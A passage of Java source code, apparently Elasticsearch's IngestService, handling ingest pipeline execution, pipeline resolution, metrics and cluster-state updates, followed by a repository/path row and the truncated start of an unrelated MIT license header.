        // only surface the top level non-failure processors; on-failure processor times will be included in the top level non-failure processor
for (Tuple<Processor, IngestMetric> processorWithMetric : compoundProcessor.getProcessorsWithMetrics()) {
Processor processor = processorWithMetric.v1();
IngestMetric metric = processorWithMetric.v2();
// unwrap 'if' and 'ignore_failure/on_failure' wrapping, so that we expose the underlying actual processor
boolean unwrapped;
do {
unwrapped = false;
if (processor instanceof ConditionalProcessor conditional) {
processor = conditional.getInnerProcessor();
metric = conditional.getMetric(); // prefer the conditional's metric, it only covers when the conditional was true
unwrapped = true;
}
if (processor instanceof OnFailureProcessor onFailure) {
processor = onFailure.getInnerProcessor();
metric = onFailure.getInnerMetric(); // the wrapped processor records the failure count
unwrapped = true;
}
} while (unwrapped);
if (processor instanceof CompoundProcessor cp) {
collectProcessorMetrics(cp, processorMetrics);
} else {
processorMetrics.add(new Tuple<>(processor, metric));
}
}
}
/**
* Used in this class and externally by the {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public static class PutPipelineClusterStateUpdateTask extends PipelineClusterStateUpdateTask {
private final PutPipelineRequest request;
PutPipelineClusterStateUpdateTask(ActionListener<AcknowledgedResponse> listener, PutPipelineRequest request) {
super(listener);
this.request = request;
}
/**
* Used by {@link org.elasticsearch.action.ingest.ReservedPipelineAction}
*/
public PutPipelineClusterStateUpdateTask(PutPipelineRequest request) {
this(null, request);
}
@Override
public IngestMetadata execute(IngestMetadata currentIngestMetadata, Collection<IndexMetadata> allIndexMetadata) {
BytesReference pipelineSource = request.getSource();
if (request.getVersion() != null) {
var currentPipeline = currentIngestMetadata != null ? currentIngestMetadata.getPipelines().get(request.getId()) : null;
if (currentPipeline == null) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"version conflict, required version [%s] for pipeline [%s] but no pipeline was found",
request.getVersion(),
request.getId()
)
);
}
final Integer currentVersion = currentPipeline.getVersion();
if (Objects.equals(request.getVersion(), currentVersion) == false) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"version conflict, required version [%s] for pipeline [%s] but current version is [%s]",
request.getVersion(),
request.getId(),
currentVersion
)
);
}
var pipelineConfig = XContentHelper.convertToMap(request.getSource(), false, request.getXContentType()).v2();
final Integer specifiedVersion = (Integer) pipelineConfig.get("version");
if (pipelineConfig.containsKey("version") && Objects.equals(specifiedVersion, currentVersion)) {
throw new IllegalArgumentException(
String.format(
Locale.ROOT,
"cannot update pipeline [%s] with the same version [%s]",
request.getId(),
request.getVersion()
)
);
}
// if no version specified in the pipeline definition, inject a version of [request.getVersion() + 1]
if (specifiedVersion == null) {
pipelineConfig.put("version", request.getVersion() == null ? 1 : request.getVersion() + 1);
try {
var builder = XContentBuilder.builder(request.getXContentType().xContent()).map(pipelineConfig);
pipelineSource = BytesReference.bytes(builder);
} catch (IOException e) {
throw new IllegalStateException(e);
}
}
}
Map<String, PipelineConfiguration> pipelines;
if (currentIngestMetadata != null) {
pipelines = new HashMap<>(currentIngestMetadata.getPipelines());
} else {
pipelines = new HashMap<>();
}
pipelines.put(request.getId(), new PipelineConfiguration(request.getId(), pipelineSource, request.getXContentType()));
return new IngestMetadata(pipelines);
}
}
void validatePipeline(Map<DiscoveryNode, IngestInfo> ingestInfos, String pipelineId, Map<String, Object> pipelineConfig)
throws Exception {
if (ingestInfos.isEmpty()) {
throw new IllegalStateException("Ingest info is empty");
}
Pipeline pipeline = Pipeline.create(pipelineId, pipelineConfig, processorFactories, scriptService);
List<Exception> exceptions = new ArrayList<>();
for (Processor processor : pipeline.flattenAllProcessors()) {
// run post-construction extra validation (if any, the default implementation from the Processor interface is a no-op)
try {
processor.extraValidation();
} catch (Exception e) {
exceptions.add(e);
}
for (Map.Entry<DiscoveryNode, IngestInfo> entry : ingestInfos.entrySet()) {
String type = processor.getType();
if (entry.getValue().containsProcessor(type) == false && ConditionalProcessor.TYPE.equals(type) == false) {
String message = "Processor type [" + processor.getType() + "] is not installed on node [" + entry.getKey() + "]";
exceptions.add(ConfigurationUtils.newConfigurationException(processor.getType(), processor.getTag(), null, message));
}
}
}
ExceptionsHelper.rethrowAndSuppress(exceptions);
}
private record IngestPipelinesExecutionResult(boolean success, boolean shouldKeep, Exception exception, String failedIndex) {
private static final IngestPipelinesExecutionResult SUCCESSFUL_RESULT = new IngestPipelinesExecutionResult(true, true, null, null);
private static final IngestPipelinesExecutionResult DISCARD_RESULT = new IngestPipelinesExecutionResult(true, false, null, null);
private static IngestPipelinesExecutionResult failAndStoreFor(String index, Exception e) {
return new IngestPipelinesExecutionResult(false, true, e, index);
}
}
/**
* Executes all applicable pipelines for a collection of documents.
* @param numberOfActionRequests The total number of requests to process.
* @param actionRequests The collection of requests to be processed.
* @param onDropped A callback executed when a document is dropped by a pipeline.
* Accepts the slot in the collection of requests that the document occupies.
* @param shouldStoreFailure A predicate executed on each ingest failure to determine if the
* failure should be stored somewhere.
* @param onStoreFailure A callback executed when a document fails ingest but the failure should
* be persisted elsewhere. Accepts the slot in the collection of requests
* that the document occupies, the index name that the request was targeting
* at the time of failure, and the exception that the document encountered.
* @param onFailure A callback executed when a document fails ingestion and does not need to be
* persisted. Accepts the slot in the collection of requests that the document
* occupies, and the exception that the document encountered.
* @param onCompletion A callback executed once all documents have been processed. Accepts the thread
* that ingestion completed on or an exception in the event that the entire operation
* has failed.
* @param executor Which executor the bulk request should be executed on.
*/
public void executeBulkRequest(
final int numberOfActionRequests,
final Iterable<DocWriteRequest<?>> actionRequests,
final IntConsumer onDropped,
final Predicate<String> shouldStoreFailure,
final TriConsumer<Integer, String, Exception> onStoreFailure,
final BiConsumer<Integer, Exception> onFailure,
final BiConsumer<Thread, Exception> onCompletion,
final Executor executor
) {
assert numberOfActionRequests > 0 : "numberOfActionRequests must be greater than 0 but was [" + numberOfActionRequests + "]";
executor.execute(new AbstractRunnable() {
@Override
public void onFailure(Exception e) {
onCompletion.accept(null, e);
}
@Override
protected void doRun() {
final Thread originalThread = Thread.currentThread();
try (var refs = new RefCountingRunnable(() -> onCompletion.accept(originalThread, null))) {
int i = 0;
for (DocWriteRequest<?> actionRequest : actionRequests) {
IndexRequest indexRequest = TransportBulkAction.getIndexWriteRequest(actionRequest);
if (indexRequest == null) {
i++;
continue;
}
PipelineIterator pipelines = getAndResetPipelines(indexRequest);
if (pipelines.hasNext() == false) {
i++;
continue;
}
// start the stopwatch and acquire a ref to indicate that we're working on this document
final long startTimeInNanos = System.nanoTime();
totalMetrics.preIngest();
final int slot = i;
final Releasable ref = refs.acquire();
final DocumentSizeObserver documentSizeObserver = documentParsingProvider.newDocumentSizeObserver();
final IngestDocument ingestDocument = newIngestDocument(indexRequest, documentSizeObserver);
final org.elasticsearch.script.Metadata originalDocumentMetadata = ingestDocument.getMetadata().clone();
// the document listener gives us three-way logic: a document can fail processing (1), or it can
// be successfully processed. a successfully processed document can be kept (2) or dropped (3).
final ActionListener<IngestPipelinesExecutionResult> documentListener = ActionListener.runAfter(
new ActionListener<>() {
@Override
public void onResponse(IngestPipelinesExecutionResult result) {
assert result != null;
if (result.success) {
if (result.shouldKeep == false) {
onDropped.accept(slot);
}
} else {
// We were given a failure result in the onResponse method, so we must store the failure
// Recover the original document state, track a failed ingest, and pass it along
updateIndexRequestMetadata(indexRequest, originalDocumentMetadata);
totalMetrics.ingestFailed();
onStoreFailure.apply(slot, result.failedIndex, result.exception);
}
}
@Override
public void onFailure(Exception e) {
totalMetrics.ingestFailed();
onFailure.accept(slot, e);
}
},
() -> {
// regardless of success or failure, we always stop the ingest "stopwatch" and release the ref to indicate
// that we're finished with this document
final long ingestTimeInNanos = System.nanoTime() - startTimeInNanos;
totalMetrics.postIngest(ingestTimeInNanos);
ref.close();
}
);
executePipelines(pipelines, indexRequest, ingestDocument, shouldStoreFailure, documentListener);
indexRequest.setNormalisedBytesParsed(documentSizeObserver.normalisedBytesParsed());
assert actionRequest.index() != null;
i++;
}
}
}
});
}
/**
* Returns the pipelines of the request, and updates the request so that it no longer references
* any pipelines (both the default and final pipeline are set to the noop pipeline).
*/
private PipelineIterator getAndResetPipelines(IndexRequest indexRequest) {
final String pipelineId = indexRequest.getPipeline();
indexRequest.setPipeline(NOOP_PIPELINE_NAME);
final String finalPipelineId = indexRequest.getFinalPipeline();
indexRequest.setFinalPipeline(NOOP_PIPELINE_NAME);
return new PipelineIterator(pipelineId, finalPipelineId);
}
/**
* A triple for tracking the non-null id of a pipeline, the pipeline itself, and whether the pipeline is a final pipeline.
*
* @param id the non-null id of the pipeline
* @param pipeline a possibly-null reference to the pipeline for the given pipeline id
* @param isFinal true if the pipeline is a final pipeline
*/
private record PipelineSlot(String id, @Nullable Pipeline pipeline, boolean isFinal) {
public PipelineSlot {
Objects.requireNonNull(id);
}
}
private class PipelineIterator implements Iterator<PipelineSlot> {
private final String defaultPipeline;
private final String finalPipeline;
private final Iterator<PipelineSlot> pipelineSlotIterator;
private PipelineIterator(String defaultPipeline, String finalPipeline) {
this.defaultPipeline = NOOP_PIPELINE_NAME.equals(defaultPipeline) ? null : defaultPipeline;
this.finalPipeline = NOOP_PIPELINE_NAME.equals(finalPipeline) ? null : finalPipeline;
this.pipelineSlotIterator = iterator();
}
public PipelineIterator withoutDefaultPipeline() {
return new PipelineIterator(null, finalPipeline);
}
private Iterator<PipelineSlot> iterator() {
PipelineSlot defaultPipelineSlot = null, finalPipelineSlot = null;
if (defaultPipeline != null) {
defaultPipelineSlot = new PipelineSlot(defaultPipeline, getPipeline(defaultPipeline), false);
}
if (finalPipeline != null) {
finalPipelineSlot = new PipelineSlot(finalPipeline, getPipeline(finalPipeline), true);
}
if (defaultPipeline != null && finalPipeline != null) {
return List.of(defaultPipelineSlot, finalPipelineSlot).iterator();
} else if (finalPipeline != null) {
return List.of(finalPipelineSlot).iterator();
} else if (defaultPipeline != null) {
return List.of(defaultPipelineSlot).iterator();
} else {
return Collections.emptyIterator();
}
}
@Override
public boolean hasNext() {
return pipelineSlotIterator.hasNext();
}
@Override
public PipelineSlot next() {
return pipelineSlotIterator.next();
}
}
private void executePipelines(
final PipelineIterator pipelines,
final IndexRequest indexRequest,
final IngestDocument ingestDocument,
final Predicate<String> shouldStoreFailure,
final ActionListener<IngestPipelinesExecutionResult> listener
) {
assert pipelines.hasNext();
PipelineSlot slot = pipelines.next();
final String pipelineId = slot.id();
final Pipeline pipeline = slot.pipeline();
final boolean isFinalPipeline = slot.isFinal();
        // reset the reroute flag; at the start of a new pipeline execution this document hasn't been rerouted yet
ingestDocument.resetReroute();
final String originalIndex = indexRequest.indices()[0];
final Consumer<Exception> exceptionHandler = (Exception e) -> {
if (shouldStoreFailure.test(originalIndex)) {
listener.onResponse(IngestPipelinesExecutionResult.failAndStoreFor(originalIndex, e));
} else {
listener.onFailure(e);
}
};
try {
if (pipeline == null) {
throw new IllegalArgumentException("pipeline with id [" + pipelineId + "] does not exist");
}
indexRequest.addPipeline(pipelineId);
executePipeline(ingestDocument, pipeline, (keep, e) -> {
assert keep != null;
if (e != null) {
logger.debug(
() -> format(
"failed to execute pipeline [%s] for document [%s/%s]",
pipelineId,
indexRequest.index(),
indexRequest.id()
),
e
);
exceptionHandler.accept(e);
return; // document failed!
}
if (keep == false) {
listener.onResponse(IngestPipelinesExecutionResult.DISCARD_RESULT);
return; // document dropped!
}
// update the index request so that we can execute additional pipelines (if any), etc
updateIndexRequestMetadata(indexRequest, ingestDocument.getMetadata());
try {
// check for self-references if necessary, (i.e. if a script processor has run), and clear the bit
if (ingestDocument.doNoSelfReferencesCheck()) {
CollectionUtils.ensureNoSelfReferences(ingestDocument.getSource(), null);
ingestDocument.doNoSelfReferencesCheck(false);
}
} catch (IllegalArgumentException ex) {
// An IllegalArgumentException can be thrown when an ingest processor creates a source map that is self-referencing.
// In that case, we catch and wrap the exception, so we can include more details
exceptionHandler.accept(
new IllegalArgumentException(
format(
"Failed to generate the source document for ingest pipeline [%s] for document [%s/%s]",
pipelineId,
indexRequest.index(),
indexRequest.id()
),
ex
)
);
return; // document failed!
}
PipelineIterator newPipelines = pipelines;
final String newIndex = indexRequest.indices()[0];
if (Objects.equals(originalIndex, newIndex) == false) {
// final pipelines cannot change the target index (either directly or by way of a reroute)
if (isFinalPipeline) {
exceptionHandler.accept(
new IllegalStateException(
format(
"final pipeline [%s] can't change the target index (from [%s] to [%s]) for document [%s]",
pipelineId,
originalIndex,
newIndex,
indexRequest.id()
)
)
);
return; // document failed!
}
// add the index to the document's index history, and check for cycles in the visited indices
boolean cycle = ingestDocument.updateIndexHistory(newIndex) == false;
if (cycle) {
List<String> indexCycle = new ArrayList<>(ingestDocument.getIndexHistory());
indexCycle.add(newIndex);
exceptionHandler.accept(
new IllegalStateException(
format(
"index cycle detected while processing pipeline [%s] for document [%s]: %s",
pipelineId,
indexRequest.id(),
indexCycle
)
)
);
return; // document failed!
}
// clear the current pipeline, then re-resolve the pipelines for this request
indexRequest.setPipeline(null);
indexRequest.isPipelineResolved(false);
resolvePipelinesAndUpdateIndexRequest(null, indexRequest, state.metadata());
newPipelines = getAndResetPipelines(indexRequest);
// for backwards compatibility, when a pipeline changes the target index for a document without using the reroute
// mechanism, do not invoke the default pipeline of the new target index
if (ingestDocument.isReroute() == false) {
newPipelines = newPipelines.withoutDefaultPipeline();
}
}
if (newPipelines.hasNext()) {
executePipelines(newPipelines, indexRequest, ingestDocument, shouldStoreFailure, listener);
} else {
// update the index request's source and (potentially) cache the timestamp for TSDB
updateIndexRequestSource(indexRequest, ingestDocument);
cacheRawTimestamp(indexRequest, ingestDocument);
listener.onResponse(IngestPipelinesExecutionResult.SUCCESSFUL_RESULT); // document succeeded!
}
});
} catch (Exception e) {
logger.debug(
() -> format("failed to execute pipeline [%s] for document [%s/%s]", pipelineId, indexRequest.index(), indexRequest.id()),
e
);
exceptionHandler.accept(e); // document failed
}
}
private static void executePipeline(
final IngestDocument ingestDocument,
final Pipeline pipeline,
final BiConsumer<Boolean, Exception> handler
) {
// adapt our {@code BiConsumer<Boolean, Exception>} handler shape to the
// {@code BiConsumer<IngestDocument, Exception>} handler shape used internally
// by ingest pipelines and processors
ingestDocument.executePipeline(pipeline, (result, e) -> {
if (e != null) {
handler.accept(true, e);
} else {
handler.accept(result != null, null);
}
});
}
public IngestStats stats() {
IngestStats.Builder statsBuilder = new IngestStats.Builder();
statsBuilder.addTotalMetrics(totalMetrics);
pipelines.forEach((id, holder) -> {
Pipeline pipeline = holder.pipeline;
CompoundProcessor rootProcessor = pipeline.getCompoundProcessor();
statsBuilder.addPipelineMetrics(id, pipeline.getMetrics());
List<Tuple<Processor, IngestMetric>> processorMetrics = new ArrayList<>();
collectProcessorMetrics(rootProcessor, processorMetrics);
processorMetrics.forEach(t -> {
Processor processor = t.v1();
IngestMetric processorMetric = t.v2();
statsBuilder.addProcessorMetrics(id, getProcessorName(processor), processor.getType(), processorMetric);
});
});
return statsBuilder.build();
}
/**
* Adds a listener that gets invoked with the current cluster state before processor factories
* get invoked.
* <p>
* This is useful for components that are used by ingest processors, so that they have the opportunity to update
* before these components get used by the ingest processor factory.
*/
public void addIngestClusterStateListener(Consumer<ClusterState> listener) {
ingestClusterStateListeners.add(listener);
}
// package private for testing
static String getProcessorName(Processor processor) {
// conditionals are implemented as wrappers around the real processor, so get the real processor for the correct type for the name
if (processor instanceof ConditionalProcessor conditionalProcessor) {
processor = conditionalProcessor.getInnerProcessor();
}
StringBuilder sb = new StringBuilder(5);
sb.append(processor.getType());
if (processor instanceof PipelineProcessor pipelineProcessor) {
String pipelineName = pipelineProcessor.getPipelineTemplate().newInstance(Map.of()).execute();
sb.append(":");
sb.append(pipelineName);
}
String tag = processor.getTag();
if (tag != null && tag.isEmpty() == false) {
sb.append(":");
sb.append(tag);
}
return sb.toString();
}
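    // Illustrative examples (tags and pipeline names are hypothetical): a plain "set" processor is reported as "set",
    // a "set" processor tagged "normalize-host" as "set:normalize-host", and a pipeline processor invoking "logs@custom"
    // with tag "route-logs" as "pipeline:logs@custom:route-logs".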
/**
* Builds a new ingest document from the passed-in index request.
*/
private static IngestDocument newIngestDocument(final IndexRequest request, DocumentSizeObserver documentSizeObserver) {
return new IngestDocument(
request.index(),
request.id(),
request.version(),
request.routing(),
request.versionType(),
request.sourceAsMap(documentSizeObserver)
);
}
/**
* Updates an index request based on the metadata of an ingest document.
*/
private static void updateIndexRequestMetadata(final IndexRequest request, final org.elasticsearch.script.Metadata metadata) {
// it's fine to set all metadata fields all the time, as ingest document holds their starting values
// before ingestion, which might also get modified during ingestion.
request.index(metadata.getIndex());
request.id(metadata.getId());
request.routing(metadata.getRouting());
request.version(metadata.getVersion());
if (metadata.getVersionType() != null) {
request.versionType(VersionType.fromString(metadata.getVersionType()));
}
Number number;
if ((number = metadata.getIfSeqNo()) != null) {
request.setIfSeqNo(number.longValue());
}
if ((number = metadata.getIfPrimaryTerm()) != null) {
request.setIfPrimaryTerm(number.longValue());
}
Map<String, String> map;
if ((map = metadata.getDynamicTemplates()) != null) {
Map<String, String> mergedDynamicTemplates = new HashMap<>(request.getDynamicTemplates());
mergedDynamicTemplates.putAll(map);
request.setDynamicTemplates(mergedDynamicTemplates);
}
}
/**
* Updates an index request based on the source of an ingest document, guarding against self-references if necessary.
*/
private static void updateIndexRequestSource(final IndexRequest request, final IngestDocument document) {
boolean ensureNoSelfReferences = document.doNoSelfReferencesCheck();
// we already check for self references elsewhere (and clear the bit), so this should always be false,
// keeping the check and assert as a guard against extraordinarily surprising circumstances
assert ensureNoSelfReferences == false;
request.source(document.getSource(), request.getContentType(), ensureNoSelfReferences);
}
/**
* Grab the @timestamp and store it on the index request so that TSDB can use it without needing to parse
* the source for this document.
*/
private static void cacheRawTimestamp(final IndexRequest request, final IngestDocument document) {
if (request.getRawTimestamp() == null) {
// cache the @timestamp from the ingest document's source map if there is one
Object rawTimestamp = document.getSource().get(DataStream.TIMESTAMP_FIELD_NAME);
if (rawTimestamp != null) {
request.setRawTimestamp(rawTimestamp);
}
}
}
@Override
public void applyClusterState(final ClusterChangedEvent event) {
state = event.state();
if (state.blocks().hasGlobalBlock(GatewayService.STATE_NOT_RECOVERED_BLOCK)) {
return;
}
// Publish cluster state to components that are used by processor factories before letting
// processor factories create new processor instances.
        // (Note that this also needs to be done when there is no change to the ingest metadata, because the update may only
        // affect the part of the cluster state that a component is interested in.)
ingestClusterStateListeners.forEach(consumer -> consumer.accept(state));
IngestMetadata newIngestMetadata = state.getMetadata().custom(IngestMetadata.TYPE);
if (newIngestMetadata == null) {
return;
}
try {
innerUpdatePipelines(newIngestMetadata);
} catch (ElasticsearchParseException e) {
logger.warn("failed to update ingest pipelines", e);
}
}
synchronized void innerUpdatePipelines(IngestMetadata newIngestMetadata) {
Map<String, PipelineHolder> existingPipelines = this.pipelines;
        // Lazily initialize these variables in order to favour the most likely scenario, which is that there are no pipeline changes:
Map<String, PipelineHolder> newPipelines = null;
List<ElasticsearchParseException> exceptions = null;
        // Iterate over the pipeline configurations in the ingest metadata and construct a new pipeline if there is no existing
        // pipeline or the pipeline configuration has been modified
for (PipelineConfiguration newConfiguration : newIngestMetadata.getPipelines().values()) {
PipelineHolder previous = existingPipelines.get(newConfiguration.getId());
if (previous != null && previous.configuration.equals(newConfiguration)) {
continue;
}
if (newPipelines == null) {
newPipelines = new HashMap<>(existingPipelines);
}
try {
Pipeline newPipeline = Pipeline.create(
newConfiguration.getId(),
newConfiguration.getConfigAsMap(),
processorFactories,
scriptService
);
newPipelines.put(newConfiguration.getId(), new PipelineHolder(newConfiguration, newPipeline));
if (previous == null) {
continue;
}
Pipeline oldPipeline = previous.pipeline;
newPipeline.getMetrics().add(oldPipeline.getMetrics());
List<Tuple<Processor, IngestMetric>> oldPerProcessMetrics = new ArrayList<>();
List<Tuple<Processor, IngestMetric>> newPerProcessMetrics = new ArrayList<>();
collectProcessorMetrics(oldPipeline.getCompoundProcessor(), oldPerProcessMetrics);
collectProcessorMetrics(newPipeline.getCompoundProcessor(), newPerProcessMetrics);
// Best attempt to populate new processor metrics using a parallel array of the old metrics. This is not ideal since
// the per processor metrics may get reset when the arrays don't match. However, to get to an ideal model, unique and
// consistent id's per processor and/or semantic equals for each processor will be needed.
if (newPerProcessMetrics.size() == oldPerProcessMetrics.size()) {
Iterator<Tuple<Processor, IngestMetric>> oldMetricsIterator = oldPerProcessMetrics.iterator();
for (Tuple<Processor, IngestMetric> compositeMetric : newPerProcessMetrics) {
String type = compositeMetric.v1().getType();
IngestMetric metric = compositeMetric.v2();
if (oldMetricsIterator.hasNext()) {
Tuple<Processor, IngestMetric> oldCompositeMetric = oldMetricsIterator.next();
String oldType = oldCompositeMetric.v1().getType();
IngestMetric oldMetric = oldCompositeMetric.v2();
if (type.equals(oldType)) {
metric.add(oldMetric);
}
}
}
}
} catch (ElasticsearchParseException e) {
Pipeline pipeline = substitutePipeline(newConfiguration.getId(), e);
newPipelines.put(newConfiguration.getId(), new PipelineHolder(newConfiguration, pipeline));
if (exceptions == null) {
exceptions = new ArrayList<>();
}
exceptions.add(e);
} catch (Exception e) {
ElasticsearchParseException parseException = new ElasticsearchParseException(
"Error updating pipeline with id [" + newConfiguration.getId() + "]",
e
);
Pipeline pipeline = substitutePipeline(newConfiguration.getId(), parseException);
newPipelines.put(newConfiguration.getId(), new PipelineHolder(newConfiguration, pipeline));
if (exceptions == null) {
exceptions = new ArrayList<>();
}
exceptions.add(parseException);
}
}
// Iterate over the current active pipelines and check whether they are missing in the pipeline configuration and
// if so delete the pipeline from new Pipelines map:
for (Map.Entry<String, PipelineHolder> entry : existingPipelines.entrySet()) {
if (newIngestMetadata.getPipelines().get(entry.getKey()) == null) {
if (newPipelines == null) {
newPipelines = new HashMap<>(existingPipelines);
}
newPipelines.remove(entry.getKey());
}
}
if (newPipelines != null) {
// Update the pipelines:
this.pipelines = Map.copyOf(newPipelines);
// Rethrow errors that may have occurred during creating new pipeline instances:
if (exceptions != null) {
ExceptionsHelper.rethrowAndSuppress(exceptions);
}
}
}
/**
* Gets all the Processors of the given type from within a Pipeline.
* @param pipelineId the pipeline to inspect
* @param clazz the Processor class to look for
     * @return the list of all processors of the given class found in the pipeline, including those wrapped inside other processors
*/
public <P extends Processor> List<P> getProcessorsInPipeline(String pipelineId, Class<P> clazz) {
Pipeline pipeline = getPipeline(pipelineId);
if (pipeline == null) {
throw new IllegalArgumentException("pipeline with id [" + pipelineId + "] does not exist");
}
List<P> processors = new ArrayList<>();
for (Processor processor : pipeline.flattenAllProcessors()) {
if (clazz.isAssignableFrom(processor.getClass())) {
processors.add(clazz.cast(processor));
}
while (processor instanceof WrappingProcessor wrappingProcessor) {
if (clazz.isAssignableFrom(wrappingProcessor.getInnerProcessor().getClass())) {
processors.add(clazz.cast(wrappingProcessor.getInnerProcessor()));
}
processor = wrappingProcessor.getInnerProcessor();
// break in the case of self referencing processors in the event a processor author creates a
// wrapping processor that has its inner processor refer to itself.
if (wrappingProcessor == processor) {
break;
}
}
}
return processors;
}
public <P extends Processor> Collection<String> getPipelineWithProcessorType(Class<P> clazz, Predicate<P> predicate) {
List<String> matchedPipelines = new LinkedList<>();
for (PipelineHolder holder : pipelines.values()) {
String pipelineId = holder.pipeline.getId();
List<P> processors = getProcessorsInPipeline(pipelineId, clazz);
if (processors.isEmpty() == false && processors.stream().anyMatch(predicate)) {
matchedPipelines.add(pipelineId);
}
}
return matchedPipelines;
}
public synchronized void reloadPipeline(String id) throws Exception {
PipelineHolder holder = pipelines.get(id);
Pipeline updatedPipeline = Pipeline.create(id, holder.configuration.getConfigAsMap(), processorFactories, scriptService);
Map<String, PipelineHolder> updatedPipelines = new HashMap<>(this.pipelines);
updatedPipelines.put(id, new PipelineHolder(holder.configuration, updatedPipeline));
this.pipelines = Map.copyOf(updatedPipelines);
}
private static Pipeline substitutePipeline(String id, ElasticsearchParseException e) {
String tag = e.getHeaderKeys().contains("processor_tag") ? e.getHeader("processor_tag").get(0) : null;
String type = e.getHeaderKeys().contains("processor_type") ? e.getHeader("processor_type").get(0) : "unknown";
String errorMessage = "pipeline with id [" + id + "] could not be loaded, caused by [" + e.getDetailedMessage() + "]";
Processor failureProcessor = new AbstractProcessor(tag, "this is a placeholder processor") {
@Override
public IngestDocument execute(IngestDocument ingestDocument) {
throw new IllegalStateException(errorMessage);
}
@Override
public String getType() {
return type;
}
};
String description = "this is a place holder pipeline, because pipeline with id [" + id + "] could not be loaded";
return new Pipeline(id, description, null, null, new CompoundProcessor(failureProcessor));
}
record PipelineHolder(PipelineConfiguration configuration, Pipeline pipeline) {
public PipelineHolder {
Objects.requireNonNull(configuration);
Objects.requireNonNull(pipeline);
}
}
private static Optional<Pipelines> resolvePipelinesFromMetadata(
DocWriteRequest<?> originalRequest,
IndexRequest indexRequest,
Metadata metadata,
long epochMillis
) {
IndexMetadata indexMetadata = null;
// start to look for default or final pipelines via settings found in the cluster metadata
if (originalRequest != null) {
indexMetadata = metadata.indices()
.get(IndexNameExpressionResolver.resolveDateMathExpression(originalRequest.index(), epochMillis));
}
// check the alias for the index request (this is how normal index requests are modeled)
if (indexMetadata == null && indexRequest.index() != null) {
IndexAbstraction indexAbstraction = metadata.getIndicesLookup().get(indexRequest.index());
if (indexAbstraction != null && indexAbstraction.getWriteIndex() != null) {
indexMetadata = metadata.index(indexAbstraction.getWriteIndex());
}
}
// check the alias for the action request (this is how upserts are modeled)
if (indexMetadata == null && originalRequest != null && originalRequest.index() != null) {
IndexAbstraction indexAbstraction = metadata.getIndicesLookup().get(originalRequest.index());
if (indexAbstraction != null && indexAbstraction.getWriteIndex() != null) {
indexMetadata = metadata.index(indexAbstraction.getWriteIndex());
}
}
if (indexMetadata == null) {
return Optional.empty();
}
final Settings settings = indexMetadata.getSettings();
return Optional.of(new Pipelines(IndexSettings.DEFAULT_PIPELINE.get(settings), IndexSettings.FINAL_PIPELINE.get(settings)));
}
private static Optional<Pipelines> resolvePipelinesFromIndexTemplates(IndexRequest indexRequest, Metadata metadata) {
if (indexRequest.index() == null) {
return Optional.empty();
}
// the index does not exist yet (and this is a valid request), so match index
// templates to look for pipelines in either a matching V2 template (which takes
// precedence), or if a V2 template does not match, any V1 templates
String v2Template = MetadataIndexTemplateService.findV2Template(metadata, indexRequest.index(), false);
if (v2Template != null) {
final Settings settings = MetadataIndexTemplateService.resolveSettings(metadata, v2Template);
return Optional.of(new Pipelines(IndexSettings.DEFAULT_PIPELINE.get(settings), IndexSettings.FINAL_PIPELINE.get(settings)));
}
String defaultPipeline = null;
String finalPipeline = null;
List<IndexTemplateMetadata> templates = MetadataIndexTemplateService.findV1Templates(metadata, indexRequest.index(), null);
// order of templates are the highest order first
for (final IndexTemplateMetadata template : templates) {
final Settings settings = template.settings();
// note: the exists/get trickiness here is because we explicitly *don't* want the default value
// of the settings -- a non-null value would terminate the search too soon
if (defaultPipeline == null && IndexSettings.DEFAULT_PIPELINE.exists(settings)) {
defaultPipeline = IndexSettings.DEFAULT_PIPELINE.get(settings);
// we can not break in case a lower-order template has a final pipeline that we need to collect
}
if (finalPipeline == null && IndexSettings.FINAL_PIPELINE.exists(settings)) {
finalPipeline = IndexSettings.FINAL_PIPELINE.get(settings);
// we can not break in case a lower-order template has a default pipeline that we need to collect
}
if (defaultPipeline != null && finalPipeline != null) {
// we can break if we have already collected a default and final pipeline
break;
}
}
// having exhausted the search, if nothing was found, then use the default noop pipeline names
defaultPipeline = Objects.requireNonNullElse(defaultPipeline, NOOP_PIPELINE_NAME);
finalPipeline = Objects.requireNonNullElse(finalPipeline, NOOP_PIPELINE_NAME);
return Optional.of(new Pipelines(defaultPipeline, finalPipeline));
}
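    // Illustrative sketch (template and pipeline names are hypothetical): if a composable (V2) template matches the target
    // index, its resolved settings decide both pipelines and any legacy (V1) templates are ignored; only when no V2 template
    // matches are the V1 templates walked highest priority first, taking the first explicitly-set default_pipeline and the
    // first explicitly-set final_pipeline, which may come from two different templates.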
/**
* Checks whether an IndexRequest has at least one pipeline defined.
* <p>
     * This method assumes that the pipelines have already been resolved.
*/
public static boolean hasPipeline(IndexRequest indexRequest) {
assert indexRequest.isPipelineResolved();
assert indexRequest.getPipeline() != null;
assert indexRequest.getFinalPipeline() != null;
return NOOP_PIPELINE_NAME.equals(indexRequest.getPipeline()) == false
|| NOOP_PIPELINE_NAME.equals(indexRequest.getFinalPipeline()) == false;
}
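    // e.g. a resolved request with pipeline "_none" but final pipeline "logs@final" (hypothetical name) still has ingest
    // work to do; only the combination "_none"/"_none" means ingest can be skipped entirely.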
private record Pipelines(String defaultPipeline, String finalPipeline) {
private static final Pipelines NO_PIPELINES_DEFINED = new Pipelines(NOOP_PIPELINE_NAME, NOOP_PIPELINE_NAME);
public Pipelines {
Objects.requireNonNull(defaultPipeline);
Objects.requireNonNull(finalPipeline);
}
}
}
| DaveCTurner/elasticsearch | server/src/main/java/org/elasticsearch/ingest/IngestService.java |
1,025 | /*
* This project is licensed under the MIT license. Module model-view-viewmodel is using ZK framework licensed under LGPL (see lgpl-3.0.txt).
*
* The MIT License
* Copyright © 2014-2022 Ilkka Seppälä
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
